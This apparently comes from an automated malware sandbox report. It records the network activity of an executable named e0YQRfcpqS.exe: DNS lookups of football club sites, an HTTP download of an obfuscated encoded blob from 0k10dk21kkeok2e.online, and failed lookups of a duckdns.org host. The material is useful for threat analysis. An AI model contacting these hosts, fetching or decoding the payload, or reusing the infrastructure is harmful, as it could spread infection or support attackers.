                                                                                                                                                                                            Mar 2, 2021 20:35:55.553601980 CET4434972299.86.159.103192.168.2.5

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                            Mar 2, 2021 20:35:49.805087090 CET53551618.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:49.811938047 CET5475753192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:49.861460924 CET53547578.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:49.958964109 CET4999253192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:50.016735077 CET53499928.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:50.023246050 CET6007553192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:50.077478886 CET53600758.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.060678959 CET5501653192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:53.115252972 CET53550168.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.121392012 CET6434553192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:53.170370102 CET53643458.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.271282911 CET5712853192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:53.325862885 CET53571288.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.332206964 CET5479153192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:53.391866922 CET53547918.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.495837927 CET5046353192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:53.555145979 CET53504638.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:54.484817982 CET5039453192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:54.536602020 CET53503948.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:54.547835112 CET5853053192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:54.599256039 CET53585308.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:54.710885048 CET5381353192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:54.769732952 CET53538138.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:54.778197050 CET6373253192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:54.851455927 CET53637328.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.625775099 CET5734453192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:55.675307989 CET53573448.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.683742046 CET5445053192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:55.737142086 CET53544508.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.829713106 CET5926153192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:55.877684116 CET53592618.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.885040998 CET5715153192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:55.946156979 CET53571518.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:06.245893002 CET5941353192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:06.305536985 CET53594138.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:06.423084021 CET6051653192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:06.471906900 CET53605168.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:07.224349022 CET5164953192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:07.271500111 CET53516498.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:08.014620066 CET6508653192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:08.238080978 CET53650868.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:08.285960913 CET5643253192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:08.509561062 CET53564328.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:08.618464947 CET5292953192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:08.664447069 CET53529298.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:09.482502937 CET6431753192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:09.531301975 CET53643178.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:10.321309090 CET6100453192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:10.371257067 CET53610048.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:11.598726034 CET5689553192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:11.644815922 CET53568958.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:13.242064953 CET6237253192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:13.287822008 CET53623728.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:18.326112032 CET6151553192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:18.371889114 CET53615158.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:34.574122906 CET5667553192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:34.600075006 CET5717253192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:34.622932911 CET53566758.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:34.655514956 CET53571728.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:34.727310896 CET5526753192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:34.796859980 CET53552678.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:37.277806997 CET5096953192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:37.323671103 CET53509698.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:43.914499998 CET6436253192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:43.964209080 CET53643628.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:01.401587009 CET5476653192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:01.449928999 CET53547668.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:02.140243053 CET6144653192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:02.195110083 CET53614468.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:02.602850914 CET5751553192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:02.665508032 CET53575158.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:03.110765934 CET5819953192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:03.177506924 CET53581998.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:03.220036983 CET6522153192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:03.292376995 CET53652218.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:03.700484991 CET6157353192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:03.756330967 CET53615738.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:04.304059029 CET5656253192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:04.358741999 CET53565628.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:05.279326916 CET5359153192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:05.329169035 CET53535918.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:06.011288881 CET5968853192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:06.069101095 CET53596888.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:06.909313917 CET5603253192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:06.972743988 CET53560328.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:07.567197084 CET6115053192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:07.623457909 CET53611508.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:23.164566994 CET6345853192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:23.215599060 CET53634588.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:24.581901073 CET5042253192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:24.647057056 CET53504228.8.8.8192.168.2.5

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Mar 2, 2021 20:35:49.298403978 CET | 192.168.2.5 | 8.8.8.8 | 0x3eef | Standard query (0) | www.chelseafc.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.354224920 CET | 192.168.2.5 | 8.8.8.8 | 0xa36a | Standard query (0) | www.chelseafc.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.511457920 CET | 192.168.2.5 | 8.8.8.8 | 0xabc8 | Standard query (0) | www.chelseafc.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.585987091 CET | 192.168.2.5 | 8.8.8.8 | 0xf8e7 | Standard query (0) | www.chelseafc.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.757347107 CET | 192.168.2.5 | 8.8.8.8 | 0xb205 | Standard query (0) | www.manutd.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.811938047 CET | 192.168.2.5 | 8.8.8.8 | 0x8a83 | Standard query (0) | www.manutd.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.958964109 CET | 192.168.2.5 | 8.8.8.8 | 0x90b8 | Standard query (0) | www.manutd.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:50.023246050 CET | 192.168.2.5 | 8.8.8.8 | 0x8691 | Standard query (0) | www.manutd.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:53.060678959 CET | 192.168.2.5 | 8.8.8.8 | 0x2583 | Standard query (0) | www.mancity.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:53.121392012 CET | 192.168.2.5 | 8.8.8.8 | 0x444b | Standard query (0) | www.mancity.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:53.271282911 CET | 192.168.2.5 | 8.8.8.8 | 0x8aad | Standard query (0) | www.mancity.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:53.332206964 CET | 192.168.2.5 | 8.8.8.8 | 0xf43f | Standard query (0) | www.mancity.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:53.495837927 CET | 192.168.2.5 | 8.8.8.8 | 0xae45 | Standard query (0) | 0k10dk21kkeok2e.online | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:54.484817982 CET | 192.168.2.5 | 8.8.8.8 | 0x255f | Standard query (0) | www.liverpoolfc.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:54.547835112 CET | 192.168.2.5 | 8.8.8.8 | 0x810a | Standard query (0) | www.liverpoolfc.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:54.710885048 CET | 192.168.2.5 | 8.8.8.8 | 0x3ee | Standard query (0) | www.liverpoolfc.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:54.778197050 CET | 192.168.2.5 | 8.8.8.8 | 0x6b11 | Standard query (0) | www.liverpoolfc.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:55.625775099 CET | 192.168.2.5 | 8.8.8.8 | 0xdcaa | Standard query (0) | www.realmadrid.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:55.683742046 CET | 192.168.2.5 | 8.8.8.8 | 0x738 | Standard query (0) | www.realmadrid.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:55.829713106 CET | 192.168.2.5 | 8.8.8.8 | 0x5718 | Standard query (0) | www.realmadrid.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:55.885040998 CET | 192.168.2.5 | 8.8.8.8 | 0xbb8a | Standard query (0) | www.realmadrid.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:36:08.014620066 CET | 192.168.2.5 | 8.8.8.8 | 0xdf51 | Standard query (0) | aca1cab2451.duckdns.org | A (IP address) | IN (0x0001)
Mar 2, 2021 20:36:08.285960913 CET | 192.168.2.5 | 8.8.8.8 | 0x6aab | Standard query (0) | aca1cab2451.duckdns.org | A (IP address) | IN (0x0001)

                                                                                                                                                                                            DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Mar 2, 2021 20:35:49.345875978 CET | 8.8.8.8 | 192.168.2.5 | 0x3eef | No error (0) | www.chelseafc.com | chelseafc.map.fastly.net | | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:35:49.345875978 CET | 8.8.8.8 | 192.168.2.5 | 0x3eef | No error (0) | chelseafc.map.fastly.net | | 151.101.2.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.345875978 CET | 8.8.8.8 | 192.168.2.5 | 0x3eef | No error (0) | chelseafc.map.fastly.net | | 151.101.66.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.345875978 CET | 8.8.8.8 | 192.168.2.5 | 0x3eef | No error (0) | chelseafc.map.fastly.net | | 151.101.130.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.345875978 CET | 8.8.8.8 | 192.168.2.5 | 0x3eef | No error (0) | chelseafc.map.fastly.net | | 151.101.194.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.405198097 CET | 8.8.8.8 | 192.168.2.5 | 0xa36a | No error (0) | www.chelseafc.com | chelseafc.map.fastly.net | | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:35:49.405198097 CET | 8.8.8.8 | 192.168.2.5 | 0xa36a | No error (0) | chelseafc.map.fastly.net | | 151.101.2.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.405198097 CET | 8.8.8.8 | 192.168.2.5 | 0xa36a | No error (0) | chelseafc.map.fastly.net | | 151.101.66.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.405198097 CET | 8.8.8.8 | 192.168.2.5 | 0xa36a | No error (0) | chelseafc.map.fastly.net | | 151.101.130.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.405198097 CET | 8.8.8.8 | 192.168.2.5 | 0xa36a | No error (0) | chelseafc.map.fastly.net | | 151.101.194.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.576670885 CET | 8.8.8.8 | 192.168.2.5 | 0xabc8 | No error (0) | www.chelseafc.com | chelseafc.map.fastly.net | | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:35:49.576670885 CET | 8.8.8.8 | 192.168.2.5 | 0xabc8 | No error (0) | chelseafc.map.fastly.net | | 151.101.2.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.576670885 CET | 8.8.8.8 | 192.168.2.5 | 0xabc8 | No error (0) | chelseafc.map.fastly.net | | 151.101.66.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.576670885 CET | 8.8.8.8 | 192.168.2.5 | 0xabc8 | No error (0) | chelseafc.map.fastly.net | | 151.101.130.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.576670885 CET | 8.8.8.8 | 192.168.2.5 | 0xabc8 | No error (0) | chelseafc.map.fastly.net | | 151.101.194.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.641621113 CET | 8.8.8.8 | 192.168.2.5 | 0xf8e7 | No error (0) | www.chelseafc.com | chelseafc.map.fastly.net | | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:35:49.641621113 CET | 8.8.8.8 | 192.168.2.5 | 0xf8e7 | No error (0) | chelseafc.map.fastly.net | | 151.101.2.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.641621113 CET | 8.8.8.8 | 192.168.2.5 | 0xf8e7 | No error (0) | chelseafc.map.fastly.net | | 151.101.66.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.641621113 CET | 8.8.8.8 | 192.168.2.5 | 0xf8e7 | No error (0) | chelseafc.map.fastly.net | | 151.101.130.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.641621113 CET | 8.8.8.8 | 192.168.2.5 | 0xf8e7 | No error (0) | chelseafc.map.fastly.net | | 151.101.194.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:49.805087090 CET | 8.8.8.8 | 192.168.2.5 | 0xb205 | No error (0) | www.manutd.com | www.manutd.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:35:49.861460924 CET | 8.8.8.8 | 192.168.2.5 | 0x8a83 | No error (0) | www.manutd.com | www.manutd.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:35:50.016735077 CET | 8.8.8.8 | 192.168.2.5 | 0x90b8 | No error (0) | www.manutd.com | www.manutd.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:35:50.077478886 CET | 8.8.8.8 | 192.168.2.5 | 0x8691 | No error (0) | www.manutd.com | www.manutd.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:35:53.115252972 CET | 8.8.8.8 | 192.168.2.5 | 0x2583 | No error (0) | www.mancity.com | www.mancity.com.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:35:53.170370102 CET | 8.8.8.8 | 192.168.2.5 | 0x444b | No error (0) | www.mancity.com | www.mancity.com.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:35:53.325862885 CET | 8.8.8.8 | 192.168.2.5 | 0x8aad | No error (0) | www.mancity.com | www.mancity.com.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:35:53.391866922 CET | 8.8.8.8 | 192.168.2.5 | 0xf43f | No error (0) | www.mancity.com | www.mancity.com.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:35:53.555145979 CET | 8.8.8.8 | 192.168.2.5 | 0xae45 | No error (0) | 0k10dk21kkeok2e.online | | 172.67.179.188 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:53.555145979 CET | 8.8.8.8 | 192.168.2.5 | 0xae45 | No error (0) | 0k10dk21kkeok2e.online | | 104.21.59.148 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:54.536602020 CET | 8.8.8.8 | 192.168.2.5 | 0x255f | No error (0) | www.liverpoolfc.com | d2hhwit6pbhmvu.cloudfront.net | | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:35:54.536602020 CET | 8.8.8.8 | 192.168.2.5 | 0x255f | No error (0) | d2hhwit6pbhmvu.cloudfront.net | | 99.86.159.34 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:54.536602020 CET | 8.8.8.8 | 192.168.2.5 | 0x255f | No error (0) | d2hhwit6pbhmvu.cloudfront.net | | 99.86.159.58 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:54.536602020 CET | 8.8.8.8 | 192.168.2.5 | 0x255f | No error (0) | d2hhwit6pbhmvu.cloudfront.net | | 99.86.159.103 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:54.536602020 CET | 8.8.8.8 | 192.168.2.5 | 0x255f | No error (0) | d2hhwit6pbhmvu.cloudfront.net | | 99.86.159.29 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:54.599256039 CET | 8.8.8.8 | 192.168.2.5 | 0x810a | No error (0) | www.liverpoolfc.com | d2hhwit6pbhmvu.cloudfront.net | | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:35:54.599256039 CET | 8.8.8.8 | 192.168.2.5 | 0x810a | No error (0) | d2hhwit6pbhmvu.cloudfront.net | | 99.86.159.103 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:54.599256039 CET | 8.8.8.8 | 192.168.2.5 | 0x810a | No error (0) | d2hhwit6pbhmvu.cloudfront.net | | 99.86.159.29 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:54.599256039 CET | 8.8.8.8 | 192.168.2.5 | 0x810a | No error (0) | d2hhwit6pbhmvu.cloudfront.net | | 99.86.159.58 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:54.599256039 CET | 8.8.8.8 | 192.168.2.5 | 0x810a | No error (0) | d2hhwit6pbhmvu.cloudfront.net | | 99.86.159.34 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:54.769732952 CET | 8.8.8.8 | 192.168.2.5 | 0x3ee | No error (0) | www.liverpoolfc.com | d2hhwit6pbhmvu.cloudfront.net | | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:35:54.769732952 CET | 8.8.8.8 | 192.168.2.5 | 0x3ee | No error (0) | d2hhwit6pbhmvu.cloudfront.net | | 99.86.159.103 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:54.769732952 CET | 8.8.8.8 | 192.168.2.5 | 0x3ee | No error (0) | d2hhwit6pbhmvu.cloudfront.net | | 99.86.159.34 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:54.769732952 CET | 8.8.8.8 | 192.168.2.5 | 0x3ee | No error (0) | d2hhwit6pbhmvu.cloudfront.net | | 99.86.159.29 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:54.769732952 CET | 8.8.8.8 | 192.168.2.5 | 0x3ee | No error (0) | d2hhwit6pbhmvu.cloudfront.net | | 99.86.159.58 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:54.851455927 CET | 8.8.8.8 | 192.168.2.5 | 0x6b11 | No error (0) | www.liverpoolfc.com | d2hhwit6pbhmvu.cloudfront.net | | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:35:54.851455927 CET | 8.8.8.8 | 192.168.2.5 | 0x6b11 | No error (0) | d2hhwit6pbhmvu.cloudfront.net | | 99.86.159.34 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:54.851455927 CET | 8.8.8.8 | 192.168.2.5 | 0x6b11 | No error (0) | d2hhwit6pbhmvu.cloudfront.net | | 99.86.159.103 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:54.851455927 CET | 8.8.8.8 | 192.168.2.5 | 0x6b11 | No error (0) | d2hhwit6pbhmvu.cloudfront.net | | 99.86.159.29 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:54.851455927 CET | 8.8.8.8 | 192.168.2.5 | 0x6b11 | No error (0) | d2hhwit6pbhmvu.cloudfront.net | | 99.86.159.58 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:35:55.675307989 CET | 8.8.8.8 | 192.168.2.5 | 0xdcaa | No error (0) | www.realmadrid.com | realmadrid.edgekey.net | | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:35:55.737142086 CET | 8.8.8.8 | 192.168.2.5 | 0x738 | No error (0) | www.realmadrid.com | realmadrid.edgekey.net | | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:35:55.877684116 CET | 8.8.8.8 | 192.168.2.5 | 0x5718 | No error (0) | www.realmadrid.com | realmadrid.edgekey.net | | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:35:55.946156979 CET | 8.8.8.8 | 192.168.2.5 | 0xbb8a | No error (0) | www.realmadrid.com | realmadrid.edgekey.net | | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:36:08.238080978 CET | 8.8.8.8 | 192.168.2.5 | 0xdf51 | Name error (3) | aca1cab2451.duckdns.org | none | none | A (IP address) | IN (0x0001)
Mar 2, 2021 20:36:08.509561062 CET | 8.8.8.8 | 192.168.2.5 | 0x6aab | Name error (3) | aca1cab2451.duckdns.org | none | none | A (IP address) | IN (0x0001)

                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                            • www.chelseafc.com
                                                                                                                                                                                            • 0k10dk21kkeok2e.online
                                                                                                                                                                                            • www.liverpoolfc.com

                                                                                                                                                                                            HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49714 | 151.101.2.133 | 80 | C:\Users\user\Desktop\e0YQRfcpqS.exe
Timestamp | kBytes transferred | Direction | Data
Mar 2, 2021 20:35:49.462201118 CET | 1002 | OUT | GET / HTTP/1.1
                                                                                                                                                                                            User-Agent: Other
                                                                                                                                                                                            Host: www.chelseafc.com
                                                                                                                                                                                            Connection: Keep-Alive
Mar 2, 2021 20:35:49.503057957 CET | 1002 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                            Retry-After: 0
                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                            Location: https://www.chelseafc.com/en
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Date: Tue, 02 Mar 2021 19:35:49 GMT
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding, Accept-Language
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            X-Powered-By: Curiosity
                                                                                                                                                                                            X-Geo-Country_code: CH


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49720 | 172.67.179.188 | 80 | C:\Users\user\Desktop\e0YQRfcpqS.exe
Timestamp | kBytes transferred | Direction | Data
Mar 2, 2021 20:35:53.605760098 CET | 2183 | OUT | GET /base/C3A1798AE90316BAA425420BB0F9E3EA.html HTTP/1.1
                                                                                                                                                                                            User-Agent: Other
                                                                                                                                                                                            Host: 0k10dk21kkeok2e.online
                                                                                                                                                                                            Connection: Keep-Alive
Mar 2, 2021 20:35:53.818006992 CET | 2184 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                            Date: Tue, 02 Mar 2021 19:35:53 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Set-Cookie: __cfduid=de601cfd894e7a52e3f504937d9a7602f1614713753; expires=Thu, 01-Apr-21 19:35:53 GMT; path=/; domain=.0k10dk21kkeok2e.online; HttpOnly; SameSite=Lax
                                                                                                                                                                                            Last-Modified: Tue, 02 Mar 2021 05:43:59 GMT
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                            cf-request-id: 089609a8280000e68419263000000001
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=2hK4mf58SEuDNvkJEogSfJr7OGAn4eAp0Y1qYqQV0y%2FRCvoODvkqKrqZpM%2B9%2BBu5TmqEu5MencWPZ1yiy4POzsxRxsrcZP9wRIrHXizF%2BhZa96RTCeVC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 629d12203f35e684-LHR
                                                                                                                                                                                            alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818113089 CET2190INData Raw: 6d 76 50 41 41 41 50 58 58 50 64 50 64 50 41 64 50 58 4c 6d 50 41 6d 50 6d 50 64 50 4c 69 50 4c 69 50 64 50 64 50 64 50 58 4c 6d 50 41 76 50 6d 50 64 50 6d 64 50 58 76 50 64 50 64 50 41 64 50 58 4c 6d 50 41 6d 50 4c 50 64 50 58 4c 6d 50 41 58 50
                                                                                                                                                                                            Data Ascii: mvPAAAPXXPdPdPAdPXLmPAmPmPdPLiPLiPdPdPdPXLmPAvPmPdPmdPXvPdPdPAdPXLmPAmPLPdPXLmPAXPLPdPmdPXmPdPdPAdPXLmPAXPXPdPmdPXLPdPdPAdPXAzPXLmPAmPiPdPXLmPAXPvPdPXLmPAXPiPdPmdPXiPdPdPAdPAAAPXgPdPdPAdPvzPdPXLmPAvPmPdPmdPXzPdPdPAdPXLmPAmPgPdPXLmPAXPgPdPLzPAg
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818135977 CET2191INData Raw: 4c 7a 50 41 67 7a 50 58 4c 4c 50 58 4c 4c 50 58 4c 4c 50 58 58 41 50 41 67 50 64 50 64 50 64 50 58 4c 6d 50 41 76 50 6d 50 64 50 58 4c 6d 50 58 58 50 58 50 64 50 64 50 58 67 50 41 41 41 50 58 51 50 64 50 64 50 41 64 50 64 50 58 58 64 50 58 4c 6d
